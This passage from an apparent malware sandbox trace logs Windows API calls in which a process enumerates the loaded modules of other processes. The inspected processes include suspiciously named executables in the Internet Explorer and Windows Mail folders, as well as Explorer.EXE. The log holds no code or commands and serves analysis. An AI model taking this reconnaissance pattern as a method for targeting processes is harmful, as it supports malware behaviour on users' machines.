lpmodinfo=0x2552ec0, cb=0x18 | out: lpmodinfo=0x2552ec0*(lpBaseOfDll=0xe20000, SizeOfImage=0x17000, EntryPoint=0xe214a1)) returned 1 [0046.454] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xe20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="than_part.exe") returned 0xd [0046.454] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xe20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\than_part.exe" (normalized: "c:\\program files (x86)\\internet explorer\\than_part.exe")) returned 0x36 [0046.454] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25550f0, cb=0x18 | out: lpmodinfo=0x25550f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0046.455] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0046.455] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0046.455] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25572c8, cb=0x18 | out: lpmodinfo=0x25572c8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0046.456] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0046.456] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0046.456] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2559488, cb=0x18 | out: lpmodinfo=0x2559488*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0046.457] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0046.457] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0046.457] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x255b658, cb=0x18 | out: lpmodinfo=0x255b658*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0046.458] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0046.458] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0046.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb68) returned 0x218 [0046.459] EnumProcessModules (in: hProcess=0x218, lphModule=0x255dd68, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x255dd68, lpcbNeeded=0x41eb20) returned 1 [0046.459] GetModuleInformation (in: hProcess=0x218, hModule=0x1010000, lpmodinfo=0x255dfd8, cb=0x18 | out: lpmodinfo=0x255dfd8*(lpBaseOfDll=0x1010000, SizeOfImage=0x17000, EntryPoint=0x10114a1)) returned 1 [0046.460] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1010000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0046.460] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1010000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Mail\\foxmailincmail.exe" (normalized: "c:\\program files\\windows mail\\foxmailincmail.exe")) returned 0x30 [0046.460] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2560208, cb=0x18 | out: lpmodinfo=0x2560208*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0046.460] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0046.461] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0046.461] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25623c8, cb=0x18 | out: lpmodinfo=0x25623c8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0046.461] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0046.462] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0046.462] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2564588, cb=0x18 | out: lpmodinfo=0x2564588*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0046.462] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0046.463] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0046.463] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2566758, cb=0x18 | out: lpmodinfo=0x2566758*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0046.464] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0046.464] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0046.465] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x218 [0046.465] EnumProcessModules (in: hProcess=0x218, lphModule=0x2568e68, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2568e68, lpcbNeeded=0x41eb20) returned 1 [0046.474] EnumProcessModules (in: hProcess=0x218, lphModule=0x2569098, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x2569098, lpcbNeeded=0x41eb20) returned 1 [0046.484] EnumProcessModules (in: hProcess=0x218, lphModule=0x25694b0, cb=0x800, lpcbNeeded=0x41eb20 | out: lphModule=0x25694b0, lpcbNeeded=0x41eb20) returned 1 [0046.492] GetModuleInformation (in: hProcess=0x218, hModule=0xff980000, lpmodinfo=0x2569d20, cb=0x18 | out: lpmodinfo=0x2569d20*(lpBaseOfDll=0xff980000, SizeOfImage=0x2c0000, EntryPoint=0xff9ab790)) returned 1 [0046.493] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff980000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="Explorer.EXE") returned 0xc [0046.493] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff980000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\Explorer.EXE" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0046.493] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x256bf10, cb=0x18 | out: lpmodinfo=0x256bf10*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0046.494] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0046.494] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0046.494] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x256e0d0, cb=0x18 | out: lpmodinfo=0x256e0d0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0046.494] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0046.495] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0046.495] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25702a0, cb=0x18 | out: lpmodinfo=0x25702a0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0046.495] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0046.496] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0046.496] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2572470, cb=0x18 | out: lpmodinfo=0x2572470*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0046.497] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0046.497] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0046.498] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2574698, cb=0x18 | out: lpmodinfo=0x2574698*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0046.498] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0046.499] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0046.499] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x2576858, cb=0x18 | out: lpmodinfo=0x2576858*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0046.500] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0046.500] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0046.501] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x2578a18, cb=0x18 | out: lpmodinfo=0x2578a18*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0046.501] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0046.502] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0046.502] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x257abd8, cb=0x18 | out: lpmodinfo=0x257abd8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0046.503] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0046.504] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0046.504] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x257ce30, cb=0x18 | out: lpmodinfo=0x257ce30*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0046.505] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0046.506] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0046.507] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x257eff0, cb=0x18 | out: lpmodinfo=0x257eff0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0046.507] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0046.508] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0046.509] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25811a0, cb=0x18 | out: lpmodinfo=0x25811a0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0046.510] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0046.510] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0046.511] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x2583378, cb=0x18 | out: lpmodinfo=0x2583378*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0046.512] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0046.513] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0046.514] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefe070000, lpmodinfo=0x2585538, cb=0x18 | out: lpmodinfo=0x2585538*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0046.516] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefe070000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0046.517] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefe070000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0046.518] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25876f8, cb=0x18 | out: lpmodinfo=0x25876f8*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0046.519] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0046.519] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0046.520] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x25898b8, cb=0x18 | out: lpmodinfo=0x25898b8*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0046.521] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0046.522] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0046.523] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8f90000, lpmodinfo=0x258ba88, cb=0x18 | out: lpmodinfo=0x258ba88*(lpBaseOfDll=0x7fef8f90000, SizeOfImage=0x1ca000, EntryPoint=0x7fef8f97a60)) returned 1 [0046.524] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8f90000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="EXPLORERFRAME.dll") returned 0x11 [0046.525] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8f90000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\EXPLORERFRAME.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")) returned 0x25 [0046.526] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbd60000, lpmodinfo=0x258dd80, cb=0x18 | out: lpmodinfo=0x258dd80*(lpBaseOfDll=0x7fefbd60000, SizeOfImage=0x43000, EntryPoint=0x7fefbd6c168)) returned 1 [0046.527] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbd60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="DUser.dll") returned 0x9 [0046.529] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbd60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DUser.dll" (normalized: "c:\\windows\\system32\\duser.dll")) returned 0x1d [0046.530] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbdb0000, lpmodinfo=0x258ff40, cb=0x18 | out: lpmodinfo=0x258ff40*(lpBaseOfDll=0x7fefbdb0000, SizeOfImage=0xf2000, EntryPoint=0x7fefbddac20)) returned 1 [0046.531] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbdb0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="DUI70.dll") returned 0x9 [0046.532] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbdb0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DUI70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")) returned 0x1d [0046.533] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x2592100, cb=0x18 | out: lpmodinfo=0x2592100*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0046.534] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="IMM32.dll") returned 0x9 [0046.535] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0046.537] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25942c0, cb=0x18 | out: lpmodinfo=0x25942c0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0046.538] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0046.539] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0046.540] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc0d0000, lpmodinfo=0x2596480, cb=0x18 | out: lpmodinfo=0x2596480*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0046.542] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0046.543] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0046.544] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x2598640, cb=0x18 | out: lpmodinfo=0x2598640*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0046.546] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0046.547] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0046.548] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x259a810, cb=0x18 | out: lpmodinfo=0x259a810*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0046.549] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0046.551] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0046.552] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x259c9e0, cb=0x18 | out: lpmodinfo=0x259c9e0*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0046.555] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0046.556] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0046.557] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x259ebb0, cb=0x18 | out: lpmodinfo=0x259ebb0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0046.559] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0046.560] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0046.562] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbca0000, lpmodinfo=0x25a0d70, cb=0x18 | out: lpmodinfo=0x25a0d70*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0046.563] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbca0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0046.565] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbca0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0046.566] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x25a2f30, cb=0x18 | out: lpmodinfo=0x25a2f30*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0046.568] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0046.570] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0046.571] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbeb0000, lpmodinfo=0x25a50e0, cb=0x18 | out: lpmodinfo=0x25a50e0*(lpBaseOfDll=0x7fefbeb0000, SizeOfImage=0x215000, EntryPoint=0x7fefc0864b0)) returned 1 [0046.573] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbeb0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="gdiplus.dll") returned 0xb [0046.574] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbeb0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")) returned 0x73 [0046.576] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x25a7360, cb=0x18 | out: lpmodinfo=0x25a7360*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0046.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0046.579] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0046.581] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25a9520, cb=0x18 | out: lpmodinfo=0x25a9520*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0046.582] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0046.585] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0046.587] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc130000, lpmodinfo=0x25ab6e0, cb=0x18 | out: lpmodinfo=0x25ab6e0*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0046.589] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc130000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 